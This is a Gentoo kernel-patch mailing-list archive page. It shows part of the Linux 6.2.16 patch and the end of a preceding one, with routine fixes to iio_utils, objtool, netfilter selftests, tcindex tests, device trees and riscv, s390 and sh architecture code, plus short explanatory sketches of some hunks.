+ 				ret = errno ? -errno : -ENODATA;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (!current_enabled) {
+-				free(filename);
+ 				count--;
+ 				continue;
+ 			}
+@@ -429,7 +424,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 						strlen(ent->d_name) -
+ 						strlen("_en"));
+ 			if (!current->name) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -439,7 +433,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			ret = iioutils_break_up_name(current->name,
+ 						     &current->generic_name);
+ 			if (ret) {
+-				free(filename);
+ 				free(current->name);
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -450,17 +443,16 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				       scan_el_dir,
+ 				       current->name);
+ 			if (ret < 0) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				fprintf(stderr, "failed to open %s\n",
+-					filename);
+-				free(filename);
++				fprintf(stderr, "failed to open %s/%s_index\n",
++					scan_el_dir, current->name);
+ 				goto error_cleanup_array;
+ 			}
+ 
+@@ -470,17 +462,14 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+-			free(filename);
+ 			/* Find the scale */
+ 			ret = iioutils_get_param_float(&current->scale,
+ 						       "scale",
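
The recurring iio_utils fix is to free the path string immediately after fopen() has consumed it, so none of the later error paths needs its own free(). Sketched in isolation, with a hypothetical helper that is not part of the tool's API:

#include <stdio.h>
#include <stdlib.h>

/* Reads one integer from @filename and takes ownership of the string. */
static int read_sysfs_int(char *filename, int *out)
{
	FILE *f = fopen(filename, "r");

	free(filename);		/* freed exactly once, on every path */
	if (!f)
		return -1;

	if (fscanf(f, "%i", out) != 1) {
		fclose(f);
		return -1;
	}
	return fclose(f) ? -1 : 0;
}
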
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index b1a5f658673f0..ea1e7cdeb1b34 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -688,6 +688,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (strncmp(key_name, STATIC_CALL_TRAMP_PREFIX_STR,
+ 			    STATIC_CALL_TRAMP_PREFIX_LEN)) {
+ 			WARN("static_call: trampoline name malformed: %s", key_name);
++			free(key_name);
+ 			return -1;
+ 		}
+ 		tmp = key_name + STATIC_CALL_TRAMP_PREFIX_LEN - STATIC_CALL_KEY_PREFIX_LEN;
+@@ -697,6 +698,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (!key_sym) {
+ 			if (!opts.module) {
+ 				WARN("static_call: can't find static_call_key symbol: %s", tmp);
++				free(key_name);
+ 				return -1;
+ 			}
+ 
+diff --git a/tools/testing/selftests/netfilter/rpath.sh b/tools/testing/selftests/netfilter/rpath.sh
+index f7311e66d2193..5289c8447a419 100755
+--- a/tools/testing/selftests/netfilter/rpath.sh
++++ b/tools/testing/selftests/netfilter/rpath.sh
+@@ -62,10 +62,16 @@ ip -net "$ns1" a a fec0:42::2/64 dev v0 nodad
+ ip -net "$ns2" a a fec0:42::1/64 dev d0 nodad
+ 
+ # firewall matches to test
+-[ -n "$iptables" ] && ip netns exec "$ns2" \
+-	"$iptables" -t raw -A PREROUTING -s 192.168.0.0/16 -m rpfilter
+-[ -n "$ip6tables" ] && ip netns exec "$ns2" \
+-	"$ip6tables" -t raw -A PREROUTING -s fec0::/16 -m rpfilter
++[ -n "$iptables" ] && {
++	common='-t raw -A PREROUTING -s 192.168.0.0/16'
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter --invert
++}
++[ -n "$ip6tables" ] && {
++	common='-t raw -A PREROUTING -s fec0::/16'
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter --invert
++}
+ [ -n "$nft" ] && ip netns exec "$ns2" $nft -f - <<EOF
+ table inet t {
+ 	chain c {
+@@ -89,6 +95,11 @@ ipt_zero_rule() { # (command)
+ 	[ -n "$1" ] || return 0
+ 	ip netns exec "$ns2" "$1" -t raw -vS | grep -q -- "-m rpfilter -c 0 0"
+ }
++ipt_zero_reverse_rule() { # (command)
++	[ -n "$1" ] || return 0
++	ip netns exec "$ns2" "$1" -t raw -vS | \
++		grep -q -- "-m rpfilter --invert -c 0 0"
++}
+ nft_zero_rule() { # (family)
+ 	[ -n "$nft" ] || return 0
+ 	ip netns exec "$ns2" "$nft" list chain inet t c | \
+@@ -101,8 +112,7 @@ netns_ping() { # (netns, args...)
+ 	ip netns exec "$netns" ping -q -c 1 -W 1 "$@" >/dev/null
+ }
+ 
+-testrun() {
+-	# clear counters first
++clear_counters() {
+ 	[ -n "$iptables" ] && ip netns exec "$ns2" "$iptables" -t raw -Z
+ 	[ -n "$ip6tables" ] && ip netns exec "$ns2" "$ip6tables" -t raw -Z
+ 	if [ -n "$nft" ]; then
+@@ -111,6 +121,10 @@ testrun() {
+ 			ip netns exec "$ns2" $nft -s list table inet t;
+ 		) | ip netns exec "$ns2" $nft -f -
+ 	fi
++}
++
++testrun() {
++	clear_counters
+ 
+ 	# test 1: martian traffic should fail rpfilter matches
+ 	netns_ping "$ns1" -I v0 192.168.42.1 && \
+@@ -120,9 +134,13 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" || die "iptables matched martian"
+ 	ipt_zero_rule "$ip6tables" || die "ip6tables matched martian"
++	ipt_zero_reverse_rule "$iptables" && die "iptables not matched martian"
++	ipt_zero_reverse_rule "$ip6tables" && die "ip6tables not matched martian"
+ 	nft_zero_rule ip || die "nft IPv4 matched martian"
+ 	nft_zero_rule ip6 || die "nft IPv6 matched martian"
+ 
++	clear_counters
++
+ 	# test 2: rpfilter match should pass for regular traffic
+ 	netns_ping "$ns1" 192.168.23.1 || \
+ 		die "regular ping 192.168.23.1 failed"
+@@ -131,6 +149,8 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" && die "iptables match not effective"
+ 	ipt_zero_rule "$ip6tables" && die "ip6tables match not effective"
++	ipt_zero_reverse_rule "$iptables" || die "iptables match over-effective"
++	ipt_zero_reverse_rule "$ip6tables" || die "ip6tables match over-effective"
+ 	nft_zero_rule ip && die "nft IPv4 match not effective"
+ 	nft_zero_rule ip6 && die "nft IPv6 match not effective"
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json b/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
+deleted file mode 100644
+index 44901db703764..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
++++ /dev/null
+@@ -1,227 +0,0 @@
+-[
+-    {
+-        "id": "8293",
+-        "name": "Add tcindex filter with default action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 1 tcindex chain 0 handle 0x0001 classid 1:1",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7281",
+-        "name": "Add tcindex filter with hash size and pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 fall_through classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "b294",
+-        "name": "Add tcindex filter with mask shift and reclassify action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action reclassify",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action reclassify",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "0532",
+-        "name": "Add tcindex filter with pass_on and continue actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 pass_on classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "d473",
+-        "name": "Add tcindex filter with pipe action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2940",
+-        "name": "Add tcindex filter with multiple actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 7 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 7 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 7 tcindex.*handle 0x0001.*action.*skbedit.*mark 7 pipe.*action.*gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "1893",
+-        "name": "List tcindex filters",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: handle 2 protocol ip prio 1 tcindex classid 1:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "handle 0x000[0-9]+ classid 1:1",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2041",
+-        "name": "Change tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter change dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "9203",
+-        "name": "Replace tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter replace dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7957",
+-        "name": "Delete tcindex filter with drop action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action drop",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-17 13:17 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-17 13:17 UTC (permalink / raw
  To: gentoo-commits

commit:     480b4d881d3b488f7d49d86245c0174a83599e8c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 17 13:17:21 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 17 13:17:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=480b4d88

Linux patch 6.2.16

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1015_linux-6.2.16.patch | 13917 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 13921 insertions(+)

diff --git a/0000_README b/0000_README
index c1153b54..e41e403e 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  1014_linux-6.2.15.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.15
 
+Patch:  1015_linux-6.2.16.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.16
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1015_linux-6.2.16.patch b/1015_linux-6.2.16.patch
new file mode 100644
index 00000000..ee24dd24
--- /dev/null
+++ b/1015_linux-6.2.16.patch
@@ -0,0 +1,13917 @@
+diff --git a/Makefile b/Makefile
+index 9f535df81b033..e00c122401919 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 15
++SUBLEVEL = 16
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+index 9b4cf5ebe6d5f..c62aff908ab48 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+@@ -63,7 +63,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+index ff4c07c69af1c..4554abf0c7cdf 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+@@ -31,7 +31,7 @@
+ 		};
+ 
+ 		system-fault {
+-			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_LOW>;
++			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_HIGH>;
+ 			panic-indicator;
+ 		};
+ 	};
+@@ -51,7 +51,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout-64.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4412-itop-elite.dts b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+index 202ab0fee3b70..bfc79490e2e22 100644
+--- a/arch/arm/boot/dts/exynos4412-itop-elite.dts
++++ b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+@@ -182,7 +182,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&pmu_system_controller 0>;
+-		clock-names = "MCLK1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm/boot/dts/s5pv210.dtsi b/arch/arm/boot/dts/s5pv210.dtsi
+index 12e90a1cc6a14..1a9e4a96b2ff7 100644
+--- a/arch/arm/boot/dts/s5pv210.dtsi
++++ b/arch/arm/boot/dts/s5pv210.dtsi
+@@ -566,7 +566,7 @@
+ 				interrupts = <29>;
+ 				clocks = <&clocks CLK_CSIS>,
+ 						<&clocks SCLK_CSIS>;
+-				clock-names = "clk_csis",
++				clock-names = "csis",
+ 						"sclk_csis";
+ 				bus-width = <4>;
+ 				status = "disabled";
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index 4cf303a779ab9..8d02b9d05738d 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -9,6 +9,7 @@ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
++CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+ 
+ ifdef CONFIG_KEXEC
+ AFLAGS_kexec_relocate.o := -mcmodel=medany $(call cc-option,-mno-relax)
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 86c56616e5dea..ea3d61de065b3 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -217,18 +217,26 @@ bool kernel_page_present(struct page *page)
+ 	pgd = pgd_offset_k(addr);
+ 	if (!pgd_present(*pgd))
+ 		return false;
++	if (pgd_leaf(*pgd))
++		return true;
+ 
+ 	p4d = p4d_offset(pgd, addr);
+ 	if (!p4d_present(*p4d))
+ 		return false;
++	if (p4d_leaf(*p4d))
++		return true;
+ 
+ 	pud = pud_offset(p4d, addr);
+ 	if (!pud_present(*pud))
+ 		return false;
++	if (pud_leaf(*pud))
++		return true;
+ 
+ 	pmd = pmd_offset(pud, addr);
+ 	if (!pmd_present(*pmd))
+ 		return false;
++	if (pmd_leaf(*pmd))
++		return true;
+ 
+ 	pte = pte_offset_kernel(pmd, addr);
+ 	return pte_present(*pte);
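
The pageattr hunk makes kernel_page_present() stop at present leaf entries instead of descending into lower-level tables that a huge mapping does not have. The corrected walk shape, reduced to a sketch:

#include <stdbool.h>

/* One entry per level, ordered pgd -> p4d -> pud -> pmd -> pte. */
struct level {
	bool present;
	bool leaf;
};

static bool page_present(const struct level *levels, int n)
{
	for (int i = 0; i < n; i++) {
		if (!levels[i].present)
			return false;
		if (levels[i].leaf)	/* huge mapping: walk ends here */
			return true;
	}
	return true;	/* every level present down to the PTE */
}
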
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index 9f18a4af9c131..cb2ee06df286c 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -192,21 +192,10 @@ static int expected_page_refs(struct page *page)
+ 	return res;
+ }
+ 
+-static int make_secure_pte(pte_t *ptep, unsigned long addr,
+-			   struct page *exp_page, struct uv_cb_header *uvcb)
++static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ {
+-	pte_t entry = READ_ONCE(*ptep);
+-	struct page *page;
+ 	int expected, cc = 0;
+ 
+-	if (!pte_present(entry))
+-		return -ENXIO;
+-	if (pte_val(entry) & _PAGE_INVALID)
+-		return -ENXIO;
+-
+-	page = pte_page(entry);
+-	if (page != exp_page)
+-		return -ENXIO;
+ 	if (PageWriteback(page))
+ 		return -EAGAIN;
+ 	expected = expected_page_refs(page);
+@@ -304,17 +293,18 @@ again:
+ 		goto out;
+ 
+ 	rc = -ENXIO;
+-	page = follow_page(vma, uaddr, FOLL_WRITE);
+-	if (IS_ERR_OR_NULL(page))
+-		goto out;
+-
+-	lock_page(page);
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+-	if (should_export_before_import(uvcb, gmap->mm))
+-		uv_convert_from_secure(page_to_phys(page));
+-	rc = make_secure_pte(ptep, uaddr, page, uvcb);
++	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
++		page = pte_page(*ptep);
++		rc = -EAGAIN;
++		if (trylock_page(page)) {
++			if (should_export_before_import(uvcb, gmap->mm))
++				uv_convert_from_secure(page_to_phys(page));
++			rc = make_page_secure(page, uvcb);
++			unlock_page(page);
++		}
++	}
+ 	pte_unmap_unlock(ptep, ptelock);
+-	unlock_page(page);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+ 
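
The uv.c rework drops follow_page() and inverts the lock order: the page is resolved from the PTE under the PTE lock, and the sleeping page lock is only trylocked there, with contention reported back as -EAGAIN so the caller retries. A userspace approximation, with both locks modelled as mutexes (in the kernel the outer one is a spinlock):

#include <errno.h>
#include <pthread.h>

static pthread_mutex_t pte_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t page_lock = PTHREAD_MUTEX_INITIALIZER;

static int make_secure_once(void)
{
	int rc = -EAGAIN;	/* default: ask the caller to retry */

	pthread_mutex_lock(&pte_lock);
	if (pthread_mutex_trylock(&page_lock) == 0) {
		/* ... convert the page while both locks are held ... */
		rc = 0;
		pthread_mutex_unlock(&page_lock);
	}
	pthread_mutex_unlock(&pte_lock);
	return rc;	/* on contention, drop everything and loop */
}
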
+diff --git a/arch/s390/kvm/pv.c b/arch/s390/kvm/pv.c
+index e032ebbf51b97..3ce5f4351156a 100644
+--- a/arch/s390/kvm/pv.c
++++ b/arch/s390/kvm/pv.c
+@@ -314,6 +314,11 @@ int kvm_s390_pv_set_aside(struct kvm *kvm, u16 *rc, u16 *rrc)
+ 	 */
+ 	if (kvm->arch.pv.set_aside)
+ 		return -EINVAL;
++
++	/* Guest with segment type ASCE, refuse to destroy asynchronously */
++	if ((kvm->arch.gmap->asce & _ASCE_TYPE_MASK) == _ASCE_TYPE_SEGMENT)
++		return -EINVAL;
++
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 74e1d873dce05..784fc6cbddb1a 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2830,6 +2830,9 @@ EXPORT_SYMBOL_GPL(s390_unlist_old_asce);
+  * s390_replace_asce - Try to replace the current ASCE of a gmap with a copy
+  * @gmap: the gmap whose ASCE needs to be replaced
+  *
++ * If the ASCE is a SEGMENT type then this function will return -EINVAL,
++ * otherwise the pointers in the host_to_guest radix tree will keep pointing
++ * to the wrong pages, causing use-after-free and memory corruption.
+  * If the allocation of the new top level page table fails, the ASCE is not
+  * replaced.
+  * In any case, the old ASCE is always removed from the gmap CRST list.
+@@ -2844,6 +2847,10 @@ int s390_replace_asce(struct gmap *gmap)
+ 
+ 	s390_unlist_old_asce(gmap);
+ 
++	/* Replacing segment type ASCEs would cause serious issues */
++	if ((gmap->asce & _ASCE_TYPE_MASK) == _ASCE_TYPE_SEGMENT)
++		return -EINVAL;
++
+ 	page = alloc_pages(GFP_KERNEL_ACCOUNT, CRST_ALLOC_ORDER);
+ 	if (!page)
+ 		return -ENOMEM;
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index 10290e5c1f438..c449e7c1b20ff 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -15,7 +15,7 @@ config SH_STANDARD_BIOS
+ 
+ config STACK_DEBUG
+ 	bool "Check for stack overflows"
+-	depends on DEBUG_KERNEL
++	depends on DEBUG_KERNEL && PRINTK
+ 	help
+ 	  This option will cause messages to be printed if free stack space
+ 	  drops below a certain limit. Saying Y here will add overhead to
+diff --git a/arch/sh/kernel/head_32.S b/arch/sh/kernel/head_32.S
+index 4adbd4ade3194..b603b7968b388 100644
+--- a/arch/sh/kernel/head_32.S
++++ b/arch/sh/kernel/head_32.S
+@@ -64,7 +64,7 @@ ENTRY(_stext)
+ 	ldc	r0, r6_bank
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov	r4, r12		! Store device tree blob pointer in r12
+ #endif
+ 	
+@@ -315,7 +315,7 @@ ENTRY(_stext)
+ 10:		
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov.l	8f, r0		! Make flat device tree available early.
+ 	jsr	@r0
+ 	 mov	r12, r4
+@@ -346,7 +346,7 @@ ENTRY(stack_start)
+ 5:	.long	start_kernel
+ 6:	.long	cpu_init
+ 7:	.long	init_thread_union
+-#if defined(CONFIG_OF_FLATTREE)
++#if defined(CONFIG_OF_EARLY_FLATTREE)
+ 8:	.long	sh_fdt_init
+ #endif
+ 
+diff --git a/arch/sh/kernel/nmi_debug.c b/arch/sh/kernel/nmi_debug.c
+index 11777867c6f5f..a212b645b4cf8 100644
+--- a/arch/sh/kernel/nmi_debug.c
++++ b/arch/sh/kernel/nmi_debug.c
+@@ -49,7 +49,7 @@ static int __init nmi_debug_setup(char *str)
+ 	register_die_notifier(&nmi_debug_nb);
+ 
+ 	if (*str != '=')
+-		return 0;
++		return 1;
+ 
+ 	for (p = str + 1; *p; p = sep + 1) {
+ 		sep = strchr(p, ',');
+@@ -70,6 +70,6 @@ static int __init nmi_debug_setup(char *str)
+ 			break;
+ 	}
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_debug", nmi_debug_setup);
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index 1fcb6659822a3..af977ec4ca5e5 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
